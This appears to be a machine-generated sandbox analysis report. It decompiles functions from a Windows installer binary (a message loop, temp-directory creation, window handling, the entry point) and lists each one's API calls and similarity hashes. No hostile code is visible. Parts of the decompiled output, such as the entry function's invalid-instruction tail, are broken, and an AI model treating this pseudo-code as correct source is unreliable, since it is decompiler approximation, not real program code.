                                                            0x00410ea4
                                                            0x00000000
                                                            0x00410ea4
                                                            0x00410e23
                                                            0x00410e10
                                                            0x00410e0a
                                                            0x00410d39
                                                            0x00410d47
                                                            0x00410d47
                                                            0x00410d4b
                                                            0x00410d51
                                                            0x00410d56
                                                            0x00410d56
                                                            0x00410d5a
                                                            0x00410da7
                                                            0x00410db3
                                                            0x00410de9
                                                            0x00410db5
                                                            0x00410db9
                                                            0x00410dbf
                                                            0x00410dc4
                                                            0x00410dc9
                                                            0x00410dd0
                                                            0x00410dd6
                                                            0x00410ddb
                                                            0x00410de0
                                                            0x00410de0
                                                            0x00410dc9
                                                            0x00410db9
                                                            0x00000000
                                                            0x00410d5c
                                                            0x00410d61
                                                            0x00410d6b
                                                            0x00410d79
                                                            0x00410d79
                                                            0x00410d7d
                                                            0x00000000
                                                            0x00410d7f
                                                            0x00410d7f
                                                            0x00410d84
                                                            0x00410d8a
                                                            0x00410d9a
                                                            0x00000000
                                                            0x00410d9f
                                                            0x00410d7d
                                                            0x00410d13
                                                            0x00410d1f
                                                            0x00410d23
                                                            0x00000000
                                                            0x00410d25
                                                            0x00410ea6
                                                            0x00410ead
                                                            0x00410eb1
                                                            0x00410eb4
                                                            0x00410eb7
                                                            0x00410ec0
                                                            0x00410ec0
                                                            0x00000000
                                                            0x00410ec6
                                                            0x00410d23

                                                            APIs
                                                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00410CAC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID: P\l$p\l
                                                            • API String ID: 3997070919-2963016475
                                                            • Opcode ID: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
                                                            • Instruction ID: dea4787ea8a346106a271a8220094215500c3d30852de538169348a6bce77c0f
                                                            • Opcode Fuzzy Hash: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
                                                            • Instruction Fuzzy Hash: EDA18D75A003099FDB24CFA9D881BEEBBB6EB58310F14452AE505A7390DBB4E9C1CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005B85F0, Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 90%
                                                            			E005B85F0(void* __eax, void* __ecx, struct tagMSG* __edx) {
				char _v19;
				int _t10;
				char _t12;
				int _t13;
				void* _t14;
				int _t30;
				int _t32;
				MSG* _t43;
				void* _t44;
				char* _t46;

				_t43 = __edx;
				_t44 = __eax;
				_t32 = 0;
				_t10 = PeekMessageW(__edx, 0, 0, 0, 0); // executed
				if(_t10 != 0) {
					_v19 = _t12;
					if(_v19 == 0) {
						_t13 = PeekMessageA(_t43, 0, 0, 0, 1);
						asm("sbb eax, eax");
						_t14 = _t13 + 1;
					} else {
						_t30 = PeekMessageW(_t43, 0, 0, 0, 1);
						asm("sbb eax, eax");
						_t14 = _t30 + 1;
					}
					if(_t14 != 0) {
						_t32 = 1;
						if(_t43->message == 0x12) {
							 *((char*)(_t44 + 0xbc)) = 1;
						} else {
							 *_t46 = 0;
							if( *((short*)(_t44 + 0x122)) != 0) {
								 *((intOrPtr*)(_t44 + 0x120))();
							}
							if(E005BA368(_t44, _t43) == 0 && E005B8488(_t44, _t43) == 0 &&  *_t46 == 0 && E005B8340(_t44, _t43) == 0 && E005B8390(_t44, _t43) == 0 && E005B82F8(_t44, _t43) == 0) {
								TranslateMessage(_t43);
								if(_v19 == 0) {
									DispatchMessageA(_t43);
								} else {
									DispatchMessageW(_t43); // executed
								}
							}
						}
					}
				}
				return _t32;
			}













                                                            0x005b85f5
                                                            0x005b85f7
                                                            0x005b85f9
                                                            0x005b8604
                                                            0x005b860b
                                                            0x005b8627
                                                            0x005b8630
                                                            0x005b8651
                                                            0x005b8659
                                                            0x005b865b
                                                            0x005b8632
                                                            0x005b863b
                                                            0x005b8643
                                                            0x005b8645
                                                            0x005b8645
                                                            0x005b865e
                                                            0x005b8664
                                                            0x005b866a
                                                            0x005b86f2
                                                            0x005b8670
                                                            0x005b8670
                                                            0x005b867c
                                                            0x005b8688
                                                            0x005b8688
                                                            0x005b8699
                                                            0x005b86d6
                                                            0x005b86e0
                                                            0x005b86eb
                                                            0x005b86e2
                                                            0x005b86e3
                                                            0x005b86e3
                                                            0x005b86e0
                                                            0x005b8699
                                                            0x005b866a
                                                            0x005b865e
                                                            0x005b8700

                                                            APIs
                                                            • PeekMessageW.USER32 ref: 005B8604
                                                            • IsWindowUnicode.USER32 ref: 005B8618
                                                            • PeekMessageW.USER32 ref: 005B863B
                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005B8651
                                                            • TranslateMessage.USER32 ref: 005B86D6
                                                            • DispatchMessageW.USER32 ref: 005B86E3
                                                            • DispatchMessageA.USER32 ref: 005B86EB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                            • String ID:
                                                            • API String ID: 2190272339-0
                                                            • Opcode ID: 2f195b20c59e7edbc16b7d2fd048cba63cfdff170111f45a03f5aac70044babc
                                                            • Instruction ID: 67b3953643da56f9c200822127d0531685f000c00b35d7cfb42a732a483186e2
                                                            • Opcode Fuzzy Hash: 2f195b20c59e7edbc16b7d2fd048cba63cfdff170111f45a03f5aac70044babc
                                                            • Instruction Fuzzy Hash: 4921D83034478065EA312D2A1C15BFE9FDD6FF1B49F14545EF58197282CEA9F846C21E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006AC8CC, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E006AC8CC(long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char* _t40;
				intOrPtr _t41;
				int _t47;
				intOrPtr _t77;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t94;
				intOrPtr _t107;
				intOrPtr _t108;

				_t105 = __esi;
				_t104 = __edi;
				_t79 = __ebx;
				_t107 = _t108;
				_t80 = 6;
				do {
					_push(0);
					_push(0);
					_t80 = _t80 - 1;
				} while (_t80 != 0);
				_push(_t80);
				_push(__ebx);
				_push(_t107);
				_push(0x6aca22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t108;
				E0060D530( &_v20, __ebx, __edx, __edi, __esi); // executed
				E0040A5A8(0x6d6530, _v20);
				_t81 =  *0x6d6530; // 0x0
				E0040B4C8( &_v24, _t81, L"Created temporary directory: ");
				E00616130(_v24, _t79, __edi, __esi);
				_t40 =  *0x6cdfdc; // 0x6d62e4
				if( *_t40 != 0) {
					_t77 =  *0x6d6530; // 0x0
					E0061583C(_t77);
				}
				_t41 =  *0x6d6530; // 0x0
				E005C4EA4(_t41,  &_v28);
				E0040B4C8( &_v8, L"_isetup", _v28);
				_t47 = CreateDirectoryW(E0040B278(_v8), 0); // executed
				if(_t47 == 0) {
					_t79 = GetLastError();
					E005CD508(0x3d,  &_v48, _v8);
					_v44 = _v48;
					E0042302C( &_v52, _t61, 0);
					_v40 = _v52;
					E005C857C(_t79,  &_v56);
					_v36 = _v56;
					E005CD4D8(0x81, 2,  &_v44,  &_v32);
					E00429008(_v32, 1);
					E004098C4();
				}
				E0062554C( &_v12);
				_t113 = _v12;
				if(_v12 != 0) {
					E0040B4C8( &_v16, L"\\_setup64.tmp", _v8);
					E006AC874(_v12, _t79, _v16, _t104, _t105, _t113); // executed
					E006255A4(_v16);
				}
				_pop(_t94);
				 *[fs:eax] = _t94;
				_push(E006ACA29);
				E0040A228( &_v56, 3);
				return E0040A228( &_v32, 7);
			}

























                                                            0x006ac8cc
                                                            0x006ac8cc
                                                            0x006ac8cc
                                                            0x006ac8cd
                                                            0x006ac8cf
                                                            0x006ac8d4
                                                            0x006ac8d4
                                                            0x006ac8d6
                                                            0x006ac8d8
                                                            0x006ac8d8
                                                            0x006ac8db
                                                            0x006ac8dc
                                                            0x006ac8df
                                                            0x006ac8e0
                                                            0x006ac8e5
                                                            0x006ac8e8
                                                            0x006ac8ee
                                                            0x006ac8fb
                                                            0x006ac903
                                                            0x006ac90e
                                                            0x006ac916
                                                            0x006ac91b
                                                            0x006ac923
                                                            0x006ac925
                                                            0x006ac92a
                                                            0x006ac92a
                                                            0x006ac932
                                                            0x006ac937
                                                            0x006ac947
                                                            0x006ac957
                                                            0x006ac95e
                                                            0x006ac965
                                                            0x006ac975
                                                            0x006ac97d
                                                            0x006ac989
                                                            0x006ac991
                                                            0x006ac999
                                                            0x006ac9a1
                                                            0x006ac9b0
                                                            0x006ac9bf
                                                            0x006ac9c4
                                                            0x006ac9c4
                                                            0x006ac9cc
                                                            0x006ac9d1
                                                            0x006ac9d5
                                                            0x006ac9e2
                                                            0x006ac9ed
                                                            0x006ac9f5
                                                            0x006ac9f5
                                                            0x006ac9fc
                                                            0x006ac9ff
                                                            0x006aca02
                                                            0x006aca0f
                                                            0x006aca21

                                                            APIs
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC957
                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC960
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: Created temporary directory: $\_setup64.tmp$_isetup$bm
                                                            • API String ID: 1375471231-4222912607
                                                            • Opcode ID: f7a217e2c30815a74382ced212125fa0efd95f934c7959fdcee1df4dfdec5075
                                                            • Instruction ID: fab29f73b12df9647497e51388a78cad5e0a4b86d3a417c00642db4583a337af
                                                            • Opcode Fuzzy Hash: f7a217e2c30815a74382ced212125fa0efd95f934c7959fdcee1df4dfdec5075
                                                            • Instruction Fuzzy Hash: 00412E34A102099BDB01FBA4D891AEEB7B6FF89704F50417AF501B7391DA34AE458B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C92C8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91windowregistryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 69%
                                                            			E005C92C8(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t10;
				intOrPtr _t17;
				intOrPtr _t24;
				intOrPtr* _t27;
				struct HWND__* _t33;
				void* _t42;
				intOrPtr _t44;
				void* _t49;
				intOrPtr _t51;
				struct HWND__* _t52;
				intOrPtr _t54;
				intOrPtr _t55;

				_t50 = __esi;
				_t42 = __edx;
				_t54 = _t55;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				if(__edx != 0) {
					_t55 = _t55 + 0xfffffff0;
					_t10 = E00408A40(_t10, _t54);
				}
				_t49 = _t10;
				_push(_t54);
				_push(0x5c93da);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55;
				E00408414(0);
				 *((intOrPtr*)(_t49 + 0xc)) = GetActiveWindow();
				 *((intOrPtr*)(_t49 + 0x10)) = GetFocus();
				_t17 = E005ABB4C(0, _t42, _t49, _t50); // executed
				 *((intOrPtr*)(_t49 + 0x14)) = _t17;
				if( *0x6d5822 == 0) {
					 *0x6d5822 = RegisterClassW(0x6ccd0c);
				}
				if( *0x6d5822 != 0) {
					_t24 = E00414DA0(0, L"TWindowDisabler-Window", 0,  *0x6d2634, 0, 0, 0, 0, 0, 0, 0x88000000); // executed
					_t51 = _t24;
					 *((intOrPtr*)(_t49 + 8)) = _t51;
					if(_t51 != 0) {
						_t5 = _t49 + 8; // 0x4134a000
						_t27 =  *0x6cdec4; // 0x6d579c
						E005B8044( *_t27,  &_v8);
						E0040B278(_v8);
						_t33 = E00414DA0(0, L"TWindowDisabler-Window", 0,  *0x6d2634, 0,  *_t5, 0, 0, 0, 0, 0x80000000); // executed
						_t52 = _t33;
						 *(_t49 + 4) = _t52;
						if(_t52 != 0) {
							ShowWindow(_t52, 8); // executed
						}
					}
				}
				SetFocus(0);
				_pop(_t44);
				 *[fs:eax] = _t44;
				_push(E005C93E1);
				return E0040A1C8( &_v8);
			}
















                                                            0x005c92c8
                                                            0x005c92c8
                                                            0x005c92c9
                                                            0x005c92cb
                                                            0x005c92cd
                                                            0x005c92ce
                                                            0x005c92cf
                                                            0x005c92d2
                                                            0x005c92d4
                                                            0x005c92d7
                                                            0x005c92d7
                                                            0x005c92de
                                                            0x005c92e2
                                                            0x005c92e3
                                                            0x005c92e8
                                                            0x005c92eb
                                                            0x005c92f2
                                                            0x005c92fc
                                                            0x005c9304
                                                            0x005c9309
                                                            0x005c930e
                                                            0x005c9319
                                                            0x005c9325
                                                            0x005c9325
                                                            0x005c9333
                                                            0x005c935e
                                                            0x005c9363
                                                            0x005c9365
                                                            0x005c936a
                                                            0x005c9379
                                                            0x005c938a
                                                            0x005c9391
                                                            0x005c9399
                                                            0x005c93a7
                                                            0x005c93ac
                                                            0x005c93ae
                                                            0x005c93b3
                                                            0x005c93b8
                                                            0x005c93b8
                                                            0x005c93b3
                                                            0x005c936a
                                                            0x005c93bf
                                                            0x005c93c6
                                                            0x005c93c9
                                                            0x005c93cc
                                                            0x005c93d9

                                                            APIs
                                                            • GetActiveWindow.USER32 ref: 005C92F7
                                                            • GetFocus.USER32 ref: 005C92FF
                                                            • RegisterClassW.USER32 ref: 005C9320
                                                            • ShowWindow.USER32(00000000,00000008,00000000,?,00000000,4134A000,00000000,00000000,00000000,00000000,80000000,00000000,?,00000000,00000000,00000000), ref: 005C93B8
                                                            • SetFocus.USER32(00000000,00000000,005C93DA,?,?,00000000,00000001,00000000,?,00624EAB,006D579C,?,00000000,006B9450,?,00000001), ref: 005C93BF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FocusWindow$ActiveClassRegisterShow
                                                            • String ID: TWindowDisabler-Window
                                                            • API String ID: 495420250-1824977358
                                                            • Opcode ID: f6024229119579bb9558f94a5f3e2433b374e9a692c523404650e8e6a3f60a8b
                                                            • Instruction ID: 15dfa4f4c92537cee7ed1e4bf608ea9bac44f034fc845b592ccaf34af6f1c1de
                                                            • Opcode Fuzzy Hash: f6024229119579bb9558f94a5f3e2433b374e9a692c523404650e8e6a3f60a8b
                                                            • Instruction Fuzzy Hash: 1321E570A41700AFD710EBA59C56F5ABBA5FB85B00F51452DF900EB6D1EB78AC40C7D8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006C4660, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 65%
                                                            			_entry_() {
				intOrPtr* _t12;
				signed int _t15;
				intOrPtr _t21;
				intOrPtr* _t22;
				intOrPtr* _t28;
				intOrPtr* _t31;
				intOrPtr* _t35;
				intOrPtr _t36;
				void* _t61;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t84;
				void* _t86;
				intOrPtr* _t88;
				intOrPtr _t89;
				void* _t90;
				intOrPtr _t92;
				void* _t93;

				E00410BA8(0x6b9a98);
				_t12 =  *0x6cdec4; // 0x6d579c
				_t15 = GetWindowLongW( *( *_t12 + 0x188), 0xffffffec);
				_t73 =  *0x6cdec4; // 0x6d579c
				SetWindowLongW( *( *_t73 + 0x188), 0xffffffec, _t15 & 0xffffff7f); // executed
				_push(_t88);
				_push(0x6c46f1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				SetErrorMode(1); // executed
				E006B9800(_t90);
				_t21 =  *0x6b96c0; // 0x6b9718
				_t22 =  *0x6cdec4; // 0x6d579c
				E005B8740( *_t22, E006B9758, _t21);
				_t76 =  *0x6cdd3c; // 0x6d57d8
				 *_t76 = 0x6b4380;
				E006B9870(_t62, _t84, _t86, _t90, _t93);
				_pop(_t77);
				 *[fs:eax] = _t77;
				_t28 =  *0x6cdec4; // 0x6d579c
				E005B8250( *_t28, L"Setup", _t90);
				_t31 =  *0x6cdec4; // 0x6d579c
				ShowWindow( *( *_t31 + 0x188), 5);
				_t35 =  *0x6cdec4; // 0x6d579c
				_t36 =  *_t35;
				_t79 =  *0x6a6ef4; // 0x6a6f4c
				 *((intOrPtr*)(_t36 + 0x10c)) = _t79;
				 *((intOrPtr*)(_t36 + 0x108)) = 0x6b3994;
				_push(_t88);
				_push(0x6c479a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				E005B881C(); // executed
				L006B09B0(_t62, _t84, _t86, _t93);
				L005B8834( *((intOrPtr*)( *0x6cdec4)), _t62,  *0x6cdab4,  *0x6a6ef4, _t84, _t86);
				L006B3B64(_t90, _t93);
				_pop(_t81);
				 *[fs:eax] = _t81;
				_push(_t88);
				_push(0x6c481d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				L005B8990( *((intOrPtr*)( *0x6cdec4)), _t62, _t84, _t86);
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(_t88);
				_push(0x6c4854);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				L006B2AB0( *0x6cdcd4 & 0xffffff00 |  *( *0x6cdcd4) == 0x00000000, _t62, _t84, _t86,  *( *0x6cdcd4));
				_pop(_t83);
				 *[fs:eax] = _t83;
				_t61 = E0040A028( *( *0x6cdcd4));
				E00409EF8();
				 *((intOrPtr*)(_t61 - 0xfffdfc)) =  *((intOrPtr*)(_t61 - 0xfffdfc)) + _t83;
				asm("invalid");
				 *0x53000000 =  *0x53000000 + 1;
				 *_t88 =  *_t88 + _t61;
				_t92 =  *_t88;
				if (_t92 == 0) goto L5;
				if (_t92 != 0) goto L6;
				if (_t92 < 0) goto 0x6c488e;
			}



























                                                            0x006c466e
                                                            0x006c4673
                                                            0x006c4683
                                                            0x006c4688
                                                            0x006c469f
                                                            0x006c46a6
                                                            0x006c46a7
                                                            0x006c46ac
                                                            0x006c46af
                                                            0x006c46b4
                                                            0x006c46b9
                                                            0x006c46be
                                                            0x006c46c9
                                                            0x006c46d0
                                                            0x006c46da
                                                            0x006c46e0
                                                            0x006c46e2
                                                            0x006c46e9
                                                            0x006c46ec
                                                            0x006c470a
                                                            0x006c4716
                                                            0x006c471d
                                                            0x006c472b
                                                            0x006c4730
                                                            0x006c4735
                                                            0x006c4737
                                                            0x006c473d
                                                            0x006c4743
                                                            0x006c474f
                                                            0x006c4750
                                                            0x006c4755
                                                            0x006c4758
                                                            0x006c4762
                                                            0x006c4767
                                                            0x006c477f
                                                            0x006c478b
                                                            0x006c4792
                                                            0x006c4795
                                                            0x006c47fb
                                                            0x006c47fc
                                                            0x006c4801
                                                            0x006c4804
                                                            0x006c480e
                                                            0x006c4815
                                                            0x006c4818
                                                            0x006c482e
                                                            0x006c482f
                                                            0x006c4834
                                                            0x006c4837
                                                            0x006c4845
                                                            0x006c484c
                                                            0x006c484f
                                                            0x006c486a
                                                            0x006c4872
                                                            0x006c4877
                                                            0x006c487d
                                                            0x006c487f
                                                            0x006c4885
                                                            0x006c4885
                                                            0x006c4888
                                                            0x006c488a
                                                            0x006c488c

                                                            APIs
                                                              • Part of subcall function 00410BA8: GetModuleHandleW.KERNEL32(00000000,?,006C4673), ref: 00410BB4
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006C4683
                                                            • SetWindowLongW.USER32 ref: 006C469F
                                                            • SetErrorMode.KERNEL32(00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C46B4
                                                              • Part of subcall function 006B9800: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A
                                                              • Part of subcall function 005B8740: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005B8765
                                                              • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                            • ShowWindow.USER32(?,00000005,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C472B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
                                                            • String ID: Loj$Setup
                                                            • API String ID: 1533765661-1180797960
                                                            • Opcode ID: 3d0304c784d3bd607acd89935b1016d88a71efec8a9d6f2a7abca0b2f7454e11
                                                            • Instruction ID: d4d45baa3e9a68820d1f8b3b63154724c7fffc608bd47f906fb52fcab16a7fb3
                                                            • Opcode Fuzzy Hash: 3d0304c784d3bd607acd89935b1016d88a71efec8a9d6f2a7abca0b2f7454e11
                                                            • Instruction Fuzzy Hash: BE216D782046009FD700EF29DC91DA67BFAEB9E71071145B8F9008B3A2CE74BC80CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005CE26C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 51%
                                                            			E005CE26C(void* __eax, void* __ebx, long* __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HDC__* _v8;
				struct tagSIZE _v16;
				struct tagTEXTMETRICW _v76;
				signed int _t26;
				signed int _t27;
				void* _t36;
				intOrPtr _t43;
				long* _t45;
				signed int* _t47;
				void* _t50;

				_t37 = __ecx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t45 = __ecx;
				_t47 = __edx;
				_t36 = __eax;
				_v8 = GetDC(0);
				_push(_t50);
				_push(0x5ce2f8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xffffffb8;
				SelectObject(_v8, E004EE238(_t36, _t36, _t37, _t45, _t47));
				GetTextExtentPointW(_v8, L"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", 0x34,  &_v16); // executed
				asm("cdq");
				_t26 = _v16.cx / 0x1a + 1;
				_t27 = _t26 >> 1;
				if(_t26 < 0) {
					asm("adc eax, 0x0");
				}
				 *_t47 = _t27;
				GetTextMetricsW(_v8,  &_v76);
				 *_t45 = _v76.tmHeight;
				_pop(_t43);
				 *[fs:eax] = _t43;
				_push(E005CE2FF);
				return ReleaseDC(0, _v8);
			}













                                                            0x005ce26c
                                                            0x005ce272
                                                            0x005ce273
                                                            0x005ce274
                                                            0x005ce275
                                                            0x005ce277
                                                            0x005ce279
                                                            0x005ce282
                                                            0x005ce287
                                                            0x005ce288
                                                            0x005ce28d
                                                            0x005ce290
                                                            0x005ce29f
                                                            0x005ce2b3
                                                            0x005ce2c0
                                                            0x005ce2c3
                                                            0x005ce2c4
                                                            0x005ce2c6
                                                            0x005ce2c8
                                                            0x005ce2c8
                                                            0x005ce2cb
                                                            0x005ce2d5
                                                            0x005ce2dd
                                                            0x005ce2e1
                                                            0x005ce2e4
                                                            0x005ce2e7
                                                            0x005ce2f7

                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 005CE27D
                                                              • Part of subcall function 004EE238: EnterCriticalSection.KERNEL32(?,00000000,004EE4A7,?,?), ref: 004EE280
                                                            • SelectObject.GDI32(00000001,00000000), ref: 005CE29F
                                                            • GetTextExtentPointW.GDI32(00000001,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CE2B3
                                                            • GetTextMetricsW.GDI32(00000001,?,00000000,005CE2F8,?,00000000,?,0068D5D0,00000001), ref: 005CE2D5
                                                            • ReleaseDC.USER32 ref: 005CE2F2
                                                            Strings
                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005CE2AA
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
